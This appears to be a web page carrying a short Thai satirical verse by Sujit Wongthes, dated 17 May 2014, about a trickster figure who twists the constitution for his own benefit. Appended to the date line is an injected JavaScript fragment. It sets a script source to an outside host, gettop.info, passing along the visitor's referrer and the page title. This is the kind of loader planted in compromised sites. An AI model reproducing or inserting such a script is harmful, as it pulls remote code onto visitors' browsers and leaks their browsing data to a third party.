คนดีศรีธนญชัยสยาม

มะกอกสามตะกร้าปาไม่ถูกทั่ว

ตลบตะแลงแพลงพลิกหลุกหลิกรัว

เลี่ยงรัฐธรรมนูญมั่วเพื่อตัวเอง

 

สุจิตต์ วงษ์เทศ

เสาร์ 17 พฤษภาคม 2557s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;